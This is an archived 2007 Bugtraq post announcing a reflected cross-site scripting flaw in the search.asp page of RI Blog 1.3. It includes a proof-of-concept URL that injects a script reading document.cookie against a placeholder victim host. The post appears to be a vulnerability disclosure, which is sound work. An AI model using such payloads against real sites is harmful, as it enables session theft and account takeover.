lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070105165604.4399.qmail@securityfocus.com> Date: 5 Jan 2007 16:56:04 -0000 From: ShaFuq31@...MaiL.CoM To: bugtraq@...urityfocus.com Subject: RI Blog 1.3 XSS Vuln. # BhhGroup.Org & Bilgi-Yonetimi.Org.Tr # script name : RI Blog 1.3 # Script Download : http://www.aspindir.com/indir.asp?id=4098 # Risk : High # Found By : ShaFuck31 # Vulnerable file : search.asp # Vulnerable : http://www.victim.com/BlogPath/search.asp?q=[XSS] # ExampLe : http://www.victim.com/BlogPath/search.asp?q=<script>alert(document.cookie);</script> #Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]